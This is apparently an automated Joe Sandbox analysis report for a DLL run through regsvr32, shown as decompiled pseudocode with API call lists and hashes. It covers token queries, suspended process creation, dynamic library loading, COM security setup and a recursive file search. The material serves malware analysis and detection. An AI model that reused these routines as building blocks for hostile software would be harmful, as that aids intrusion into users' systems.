0x6cb0ba40
0x6cb0ba07
0x6cb0ba0f
0x6cb0ba11
0x6cb0ba17
0x6cb0ba30
0x00000000
0x6cb0ba32
0x6cb0ba37
0x00000000
0x6cb0ba3d
0x6cb0ba19
0x6cb0ba19
0x6cb0ba19
0x6cb0ba19
0x6cb0ba17
0x6cb0ba46

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,6CB00000,00000000,00000000,?,6CB0BA79,?,00000000,?,6CB0D0EA), ref: 6CB0B9F5
GetLastError.KERNEL32(?,6CB0BA79,?,00000000,?,6CB0D0EA), ref: 6CB0B9FC

Part of subcall function 6CB085E5: HeapAlloc.KERNEL32(00000008,?,?,6CB08F65,00000100,?,6CB05FAC), ref: 6CB085F3

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,6CB0BA79,?,00000000,?,6CB0D0EA), ref: 6CB0BA2B

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: InformationToken$AllocErrorHeapLast
String ID:
API String ID: 4258577378-0
Opcode ID: 93efd0572a67e687c0a14c0ebb287316692a7cc18e2f291fbae19cbb441ff6fd
Instruction ID: 13438a4a5afb8819393044652395d4822cff0455f10f0c1d984b0c5b6ace4c0b
Opcode Fuzzy Hash: 93efd0572a67e687c0a14c0ebb287316692a7cc18e2f291fbae19cbb441ff6fd
Instruction Fuzzy Hash: 2B016772704158BF87249AA6DC4AD8F7FBCDB457A47110566F505D3910EB31DE00D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0825A, Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E6CB0825A() {
				short* _v8;
				char* _v12;
				short* _t8;
				int _t20;
				short* _t22;
				char* _t27;
				int _t30;

				_push(_t22);
				_push(_t22);
				_t8 = _t22;
				_t30 = 0;
				_v8 = _t8;
				if(_t8 != 0) {
					_t20 = WideCharToMultiByte(0xfde9, 0, _t8, 0xffffffff, 0, 0, 0, 0);
					if(_t20 > 0) {
						_t2 = _t20 + 1; // 0x1
						_t27 = E6CB085E5(_t2);
						_v12 = _t27;
						if(_t27 != 0) {
							if(WideCharToMultiByte(0xfde9, 0, _v8, 0xffffffff, _t27, _t20, 0, 0) > 0) {
								_v12 = _t27;
								_t30 = E6CB101B7(_t27);
								E6CB085FB( &_v12, _t20);
							} else {
								E6CB085FB( &_v12, 0); // executed
							}
						}
					}
				}
				return _t30;
			}

0x6cb0825d
0x6cb0825e
0x6cb0825f
0x6cb08262
0x6cb08264
0x6cb08269
0x6cb0827f
0x6cb08283
0x6cb08285
0x6cb0828f
0x6cb08291
0x6cb08297
0x6cb082b0
0x6cb082c1
0x6cb082c9
0x6cb082d0
0x6cb082b2
0x6cb082b7
0x6cb082bd
0x6cb082b0
0x6cb082d8
0x6cb082d9
0x6cb082de

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00DBF960,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00DBF960,00DBF960,?,6CB079E0,00000000), ref: 6CB08279

Part of subcall function 6CB085E5: HeapAlloc.KERNEL32(00000008,?,?,6CB08F65,00000100,?,6CB05FAC), ref: 6CB085F3

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,6CB079E0,00000000), ref: 6CB082A8

Part of subcall function 6CB085FB: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 6CB08641

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: ByteCharHeapMultiWide$AllocFree
String ID:
API String ID: 3690260804-0
Opcode ID: eda0604b116bf211fb14d933b5ef6438476da099105d046875a4b2eac9003488
Instruction ID: 26ae6a8fbec4021df980379f0885bee69239140dfd5d2c4801593d835191b783
Opcode Fuzzy Hash: eda0604b116bf211fb14d933b5ef6438476da099105d046875a4b2eac9003488
Instruction Fuzzy Hash: 8001DD767057657A9B105AAA8C48CDF7EACDF466B87100227B514D2A80EB71CF08C3B1

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0AEA8, Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E6CB0AEA8(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				WCHAR* _t15;
				int _t19;
				struct _PROCESS_INFORMATION* _t20;

				_t20 = __edx;
				_t15 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 = 0x44;
				memset( &_v72, 0, _t19);
				_v72.cb = _t19;
				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x6cb0aeb1
0x6cb0aeb7
0x6cb0aebb
0x6cb0aebc
0x6cb0aebd
0x6cb0aebe
0x6cb0aec2
0x6cb0aec7
0x6cb0aecf
0x6cb0aee7
0x6cb0aeed
0x6cb0aef5

APIs

memset.MSVCRT ref: 6CB0AEC7
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 6CB0AEE7

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: CreateProcessmemset
String ID:
API String ID: 2296119082-0
Opcode ID: 03d6e5fef119b693b02bc3ce16daf2cbcca0b04cc81d26cc5ec840d518bd273e
Instruction ID: 7e84a84e4e2585b0acac414d4cc08d97b1a669001f90b28b273abd302e56d7b3
Opcode Fuzzy Hash: 03d6e5fef119b693b02bc3ce16daf2cbcca0b04cc81d26cc5ec840d518bd273e
Instruction Fuzzy Hash: 2DF01CF26042087FF760D9ADDC4AEBFB6ACDB89664F100532BA05D6190E560AD0582A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0E1FE, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E6CB0E1FE(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E6CB095A8(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E6CB0E1B3(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E6CB085A3( &_v8);
				return _t25;
			}

0x6cb0e201
0x6cb0e204
0x6cb0e20a
0x6cb0e20c
0x6cb0e211
0x6cb0e213
0x6cb0e21d
0x6cb0e21e
0x6cb0e22d
0x6cb0e220
0x6cb0e220
0x6cb0e220
0x6cb0e231
0x6cb0e238
0x6cb0e23e
0x6cb0e23e
0x6cb0e243
0x6cb0e24e

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,6CB1BA20), ref: 6CB0E220
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,6CB1BA20), ref: 6CB0E22D

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: b82146d65fa42a4e7840d0b3b88e9fa8184aef11483b5ce41773854c0812c01b
Instruction ID: e060c7bd991c9851f297f9d710442526839e55276892131e219f5d85243b3937
Opcode Fuzzy Hash: b82146d65fa42a4e7840d0b3b88e9fa8184aef11483b5ce41773854c0812c01b
Instruction Fuzzy Hash: 83F0A771700194ABD7089BADE8858DEBBFC9F95658724406FF505D3740DAB0EE4086E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0CD02, Relevance: 2.5, APIs: 2, Instructions: 48
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6CB0CD02(void* __ecx, intOrPtr _a4, signed int _a8) {
				CHAR* _v8;
				int _t28;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				void* _t38;
				signed int* _t41;

				_t41 = _a8;
				_t31 = 0;
				if(_t41[1] > 0) {
					_t38 = 0;
					do {
						_t3 =  &(_t41[2]); // 0xe6840d8b
						_t34 =  *_t3;
						_t35 = 0;
						_a8 = 0;
						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
							_v8 = _a4 + 0x24;
							while(1) {
								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
								_t14 =  &(_t41[2]); // 0xe6840d8b
								_t34 =  *_t14;
								if(_t28 == 0) {
									break;
								}
								_t35 = _a8 + 1;
								_a8 = _t35;
								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t41 =  *_t41 |  *(_t34 + _t38);
						}
						L8:
						_t31 = _t31 + 1;
						_t38 = _t38 + 0x10;
						_t20 =  &(_t41[1]); // 0x1374ff85
					} while (_t31 <  *_t20);
				}
				Sleep(0xa);
				return 1;
			}

0x6cb0cd08
0x6cb0cd0b
0x6cb0cd10
0x6cb0cd13
0x6cb0cd15
0x6cb0cd15
0x6cb0cd15
0x6cb0cd18
0x6cb0cd1a
0x6cb0cd21
0x6cb0cd29
0x6cb0cd2c
0x6cb0cd36
0x6cb0cd3c
0x6cb0cd3c
0x6cb0cd41
0x00000000
0x00000000
0x6cb0cd46
0x6cb0cd47
0x6cb0cd4e
0x00000000
0x00000000
0x6cb0cd50
0x00000000
0x6cb0cd4e
0x6cb0cd55
0x6cb0cd55
0x6cb0cd57
0x6cb0cd57
0x6cb0cd58
0x6cb0cd5b
0x6cb0cd5b
0x6cb0cd60
0x6cb0cd68
0x6cb0cd74

APIs

lstrcmpi.KERNEL32(?,?,00000128,00000000,?,?,?,6CB0AC4F,?,?), ref: 6CB0CD36
Sleep.KERNEL32(0000000A,00000000,?,?,?,6CB0AC4F,?,?), ref: 6CB0CD68

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: Sleeplstrcmpi
String ID:
API String ID: 1261054337-0
Opcode ID: 9493a594bc666eb989c95b391b4cb56c85850e9e029e678d5f4f7f3206124f2d
Instruction ID: c468f67a6bc84edf20a13041ab0f1ccf2ad4398aea70946b1bc90f17cf9be06e
Opcode Fuzzy Hash: 9493a594bc666eb989c95b391b4cb56c85850e9e029e678d5f4f7f3206124f2d
Instruction Fuzzy Hash: 7501C430600225EFDB10DF69C880959BBF5FF84318721C129E4698BA11C730E942CF62

Uniqueness

Uniqueness Score: -1.00%

Function 6CB05E77, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6CB05E77() {
				intOrPtr _t3;

				_t3 =  *0x6cb1e684; // 0xdbfaa0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x6cb1e6a8, 0xffffffff);
				ExitProcess(0);
			}

0x6cb05e77
0x6cb05e84
0x6cb05e8e

APIs

ExitProcess.KERNEL32(00000000), ref: 6CB05E8E

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5247411ebb332810a4ce07048ca2329b69f515592ed2bab6ce591d156ac9f89b
Instruction ID: 71a4d4f9fa0582b511975babc26614502bdb511f1dd158f1c925e5a8351936e1
Opcode Fuzzy Hash: 5247411ebb332810a4ce07048ca2329b69f515592ed2bab6ce591d156ac9f89b
Instruction Fuzzy Hash: C8C00271315191AFDE409BA4C94EF0877B1AB5A322FA242A5F5259B9E6CA309800DB51

Uniqueness

Uniqueness Score: -1.00%

Function 6CB085D0, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6CB085D0() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x6cb1e768 = _t1;
				return _t1;
			}

0x6cb085d9
0x6cb085df
0x6cb085e4

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000,6CB05F88), ref: 6CB085D9

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: df91bde59fb376df19a8b55c5dfca78031a28d064a10670cc8d5bc26879018bd
Instruction ID: 15c10a99b96d1633331e6ff05222642aa89f8fdd01f66bec65b3ae2efdf478e1
Opcode Fuzzy Hash: df91bde59fb376df19a8b55c5dfca78031a28d064a10670cc8d5bc26879018bd
Instruction Fuzzy Hash: 4CB012B0B803009AFA501B204C0FB047570B305B06F300002B7085A9C4C7B01000CA54

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0BAA4, Relevance: 1.3, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E6CB0BAA4(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E6CB0B988(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E6CB0B9DA(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						CloseHandle(_v16);
						if(_t48 != 0) {
							E6CB085FB( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x6cb1e68c; // 0xdbfc68
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x6cb1e68c; // 0xdbfc68
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x6cb1e68c; // 0xdbfc68
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}

0x6cb0baab
0x6cb0baad
0x6cb0bab4
0x6cb0bab6
0x6cb0bab9
0x6cb0babe
0x6cb0bac3
0x6cb0bacd
0x6cb0bad0
0x6cb0bad3
0x6cb0bad8
0x6cb0bada
0x6cb0bae0
0x6cb0bb40
0x6cb0bb48
0x6cb0bb4e
0x6cb0bb55
0x6cb0bb5b
0x00000000
0x6cb0bb5c
0x6cb0bae5
0x6cb0bae6
0x6cb0bae7
0x6cb0bae8
0x6cb0bae9
0x6cb0baea
0x6cb0baeb
0x6cb0baec
0x6cb0baf1
0x6cb0baf3
0x6cb0baf8
0x6cb0baf9
0x6cb0bb03
0x00000000
0x00000000
0x6cb0bb07
0x6cb0bb33
0x6cb0bb33
0x6cb0bb3b
0x6cb0bb3e
0x00000000
0x6cb0bb3e
0x6cb0bb09
0x6cb0bb09
0x6cb0bb0c
0x6cb0bb0f
0x6cb0bb0f
0x6cb0bb12
0x6cb0bb14
0x6cb0bb1e
0x00000000
0x00000000
0x6cb0bb23
0x6cb0bb24
0x6cb0bb27
0x6cb0bb2c
0x00000000
0x00000000
0x00000000
0x6cb0bb2e
0x6cb0bb32
0x00000000
0x6cb0bb32
0x6cb0bb61

APIs

Part of subcall function 6CB0B988: GetCurrentThread.KERNEL32(00000008,00000000,6CB00000,00000000,?,?,6CB0BABE,74EC17D9,6CB00000), ref: 6CB0B99B
Part of subcall function 6CB0B988: OpenThreadToken.ADVAPI32(00000000,?,?,6CB0BABE,74EC17D9,6CB00000), ref: 6CB0B9A2
Part of subcall function 6CB0B988: GetLastError.KERNEL32(?,?,6CB0BABE,74EC17D9,6CB00000), ref: 6CB0B9A9
Part of subcall function 6CB0B988: GetCurrentProcess.KERNEL32(00000008,6CB00000,?,?,6CB0BABE,74EC17D9,6CB00000), ref: 6CB0B9C2
Part of subcall function 6CB0B988: OpenProcessToken.ADVAPI32(00000000,?,?,6CB0BABE,74EC17D9,6CB00000), ref: 6CB0B9C9

Part of subcall function 6CB0B9DA: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,6CB00000,00000000,00000000,?,6CB0BA79,?,00000000,?,6CB0D0EA), ref: 6CB0B9F5
Part of subcall function 6CB0B9DA: GetLastError.KERNEL32(?,6CB0BA79,?,00000000,?,6CB0D0EA), ref: 6CB0B9FC

CloseHandle.KERNEL32(?,00000000,74EC17D9,6CB00000), ref: 6CB0BB48

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: Token$CurrentErrorLastOpenProcessThread$CloseHandleInformation
String ID:
API String ID: 1020899596-0
Opcode ID: 2f58596ec3ce4ae36343674ff1497589340a47195af6b2c4681e452e8783de68
Instruction ID: 60850df23de8be510c8295c873ed8ce1cd479fe27b7c20fb17e432ab6f67b0b5
Opcode Fuzzy Hash: 2f58596ec3ce4ae36343674ff1497589340a47195af6b2c4681e452e8783de68
Instruction Fuzzy Hash: A5215E72B00249AFDB00DFE9D889E9EBBF8FF44714B614069E601E7655D730DA05CB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6CB0D565, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E6CB0D565(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x6cb1b848, 0, 1, 0x6cb1b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E6CB085E5(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x6cb0d572
0x6cb0d575
0x6cb0d578
0x6cb0d589
0x6cb0d58f
0x6cb0d5a0
0x6cb0d5a8
0x6cb0d5f9
0x6cb0d5f9
0x6cb0d5fe
0x6cb0d603
0x6cb0d603
0x6cb0d606
0x6cb0d60b
0x6cb0d610
0x6cb0d610
0x6cb0d613
0x6cb0d5aa
0x6cb0d5ab
0x6cb0d5b1
0x6cb0d5c2
0x6cb0d5c7
0x00000000
0x6cb0d5c9
0x6cb0d5d6
0x6cb0d5de
0x00000000
0x6cb0d5e0
0x6cb0d5e2
0x6cb0d5ea
0x00000000
0x6cb0d5ec
0x6cb0d5ef
0x6cb0d5f5
0x6cb0d5f5
0x6cb0d5ea
0x6cb0d5de
0x6cb0d5c7
0x6cb0d618

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 6CB0D578
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 6CB0D589
CoCreateInstance.OLE32(6CB1B848,00000000,00000001,6CB1B858,?), ref: 6CB0D5A0
SysAllocString.OLEAUT32(00000000), ref: 6CB0D5AB
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 6CB0D5D6

Part of subcall function 6CB085E5: HeapAlloc.KERNEL32(00000008,?,?,6CB08F65,00000100,?,6CB05FAC), ref: 6CB085F3

Memory Dump Source

Source File: 00000008.00000002.646378141.000000006CB01000.00000020.00020000.sdmp, Offset: 6CB00000, based on PE: true

Associated: 00000008.00000002.646374139.000000006CB00000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646389051.000000006CB18000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.646394043.000000006CB1D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.646397499.000000006CB1F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6cb00000_regsvr32.jbxd

Similarity

API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 2855449287-0
Opcode ID: 175d3f62c2dcf7ca88204ef26d6c232d6e8a887e07b60b11c9e89e74452df756
Instruction ID: ff91b1205e4587fd0d08b4e7f790cd979b7940efc74569cdcb977f4fa54ba357
Opcode Fuzzy Hash: 175d3f62c2dcf7ca88204ef26d6c232d6e8a887e07b60b11c9e89e74452df756
Instruction Fuzzy Hash: EF213774701285BBEB248B66DC4DE5BBF7CEFC7B25F10015DB901AB690DA719A00CA30

Uniqueness

Uniqueness Score: -1.00%

Function 6CB0AEF6, Relevance: 3.1, APIs: 2, Instructions: 113
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E6CB0AEF6(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				short _v560;
				short _v562;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t27;
				void* _t31;
				int _t36;
				intOrPtr _t37;
				intOrPtr _t44;
				void* _t48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t56;
				void* _t61;
				char _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t80;

				_t80 = __fp0;
				_push(0);
				_t51 = __ecx;
				_push(L"\\*");
				_t27 = E6CB092C6(__ecx);
				_t65 = _t64 + 0xc;
				_v16 = _t27;
				if(_t27 == 0) {
					return _t27;
				}
				_t61 = FindFirstFileW(_t27,  &_v608);
				if(_t61 == 0xffffffff) {
					L18:
					return E6CB085FB( &_v16, 0xfffffffe);
				}
				_t31 = 0x2e;
				do {
					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
						if((_v608.dwFileAttributes & 0x00000010) != 0) {
							L14:
							_push(0);
							_push( &(_v608.cFileName));
							_push("\\");
							_t62 = E6CB092C6(_t51);
							_t65 = _t65 + 0x10;
							_v12 = _t62;
							if(_t62 != 0) {
								_t56 =  *0x6cb1e684; // 0xdbfaa0
								 *((intOrPtr*)(_t56 + 0xb4))(1);
								_push(1);
								_push(1);
								_push(0);
								E6CB0AEF6(_t62, _t80, 1, 5, E6CB0EFEC, _a16);
								_t65 = _t65 + 0x1c;
								E6CB085FB( &_v12, 0xfffffffe);
							}
							goto L16;
						}
						_t63 = 0;
						do {
							_t10 = _t63 + 0x6cb1e78c; // 0x0
							_push( *_t10);
							_push( &(_v608.cFileName));
							_t44 =  *0x6cb1e690; // 0xdbfd40
							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
								goto L12;
							}
							_t48 = E6CB0EFEC(_t80, _t51,  &_v608, _a16);
							_t65 = _t65 + 0xc;
							if(_t48 == 0) {
								break;
							}
							_t49 =  *0x6cb1e684; // 0xdbfaa0
							 *((intOrPtr*)(_t49 + 0xb4))(1);
							L12:
							_t63 = _t63 + 4;
						} while (_t63 < 4);
						if((_v608.dwFileAttributes & 0x00000010) == 0) {
							goto L16;
						}
						goto L14;
					}
					L16:
					_t36 = FindNextFileW(_t61,  &_v608);
					_t31 = 0x2e;
				} while (_t36 != 0);
				_t37 =  *0x6cb1e684; // 0xdbfaa0
				 *((intOrPtr*)(_t37 + 0x78))(_t61);
				goto L18;
			}

0x6cb0aef6
0x6cb0af02
0x6cb0af04
0x6cb0af06
0x6cb0af0c
0x6cb0af11
0x6cb0af14
0x6cb0af19
0x6cb0b053
0x6cb0b053
0x6cb0af2d
0x6cb0af32
0x6cb0b042
0x00000000
0x6cb0b04e
0x6cb0af3a
0x6cb0af3b
0x6cb0af42
0x6cb0af71
0x6cb0afc4
0x6cb0afc4
0x6cb0afcc
0x6cb0afcd
0x6cb0afd8
0x6cb0afda
0x6cb0afdd
0x6cb0afe2
0x6cb0afe4
0x6cb0afec
0x6cb0aff2
0x6cb0aff4
0x6cb0aff6
0x6cb0b00b
0x6cb0b010
0x6cb0b019
0x6cb0b01f
0x00000000
0x6cb0afe2
0x6cb0af73
0x6cb0af75
0x6cb0af75
0x6cb0af75
0x6cb0af81
0x6cb0af82
0x6cb0af8c
0x00000000
0x00000000
0x6cb0af99
0x6cb0af9e
0x6cb0afa3
0x00000000
0x00000000
0x6cb0afa5
0x6cb0afac
0x6cb0afb2
0x6cb0afb2
0x6cb0afb5
0x6cb0afc2
0x00000000
0x00000000
0x00000000
0x6cb0afc2
0x6cb0b020
